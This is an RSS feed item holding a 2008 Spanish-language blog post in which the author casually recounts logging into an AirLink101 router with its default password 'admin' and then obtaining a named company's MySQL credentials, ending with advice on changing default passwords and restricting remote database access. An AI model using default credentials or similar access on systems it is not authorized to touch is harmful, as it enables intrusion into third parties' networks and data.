		<category><![CDATA[network]]></category>
		<category><![CDATA[personal]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://albertux.ayalasoft.com/es/?p=917</guid>
		<description><![CDATA[Saturday Morning Hacking Este sabado en la ma&#241;ana (madrugada para mi) acompa&#241;e a mi tia a un curso de RNA (Redes Neuronales Artificiales) aplicadas a la valuacion (mi tia es Arquitecta) Me meti a un ruter AirLink101 (pesimo password: admin) aburrido un poco empeze a jugar con la pagina de AINetSolutions, despues de un tiempo [...]<p><a href="http://albertux.ayalasoft.com/es/2008/11/08/saturday-morning-hacking/">Saturday Morning Hacking</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></description>
			<content:encoded><![CDATA[<p><strong>Saturday Morning Hacking</strong></p>
<p>Este sabado en la ma&ntilde;ana (madrugada para mi) acompa&ntilde;e a mi tia a un curso de RNA (Redes Neuronales Artificiales) aplicadas a  la valuacion (mi tia es Arquitecta)</p>
<p>Me meti a un ruter <a href="http://www.airlink101.com/" target="_blank">AirLink101</a> (pesimo password: admin) aburrido un poco empeze a jugar con la pagina de <a href="http://www.ainetsolutions.com/" target="_blank">AINetSolutions</a>, despues de un tiempo consegui el usuario y password de MySQL.</p>
<p>Aqui un screenshoot:</p>
<p><a href="http://ayalasoft.com/img/ainet.jpg" rel="shadowbox"><img src="http://ayalasoft.com/img/thumb_ainet.jpg"></a></p>
<p>No modifique nada, solo estuve de observador.</p>
<p>Saludos a toda la raza del <a href="http://www.mexhackteam.org" target="_blank">MHT</a>, recordando viejas costumbres este dia.</p>
<p>Les mande un correo a los de AINetSolutions espero no se molesten por publicarlo en mi Blog.</p>
<p>Como medidas de seguridad siempre cambien el password del ruter nunca dejen el password que viene por defecto, de preferencia no utilizen conexiones remotas de MySQL o si las requieren utilizen un filtro de IP.</p>
<p><a href="http://albertux.ayalasoft.com/es/2008/11/08/saturday-morning-hacking/">Saturday Morning Hacking</a> is a post from: <a href="http://albertux.ayalasoft.com">Albertux~# ./Blog</a></p>
]]></content:encoded>
			<wfw:commentRss>http://albertux.ayalasoft.com/es/2008/11/08/saturday-morning-hacking/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
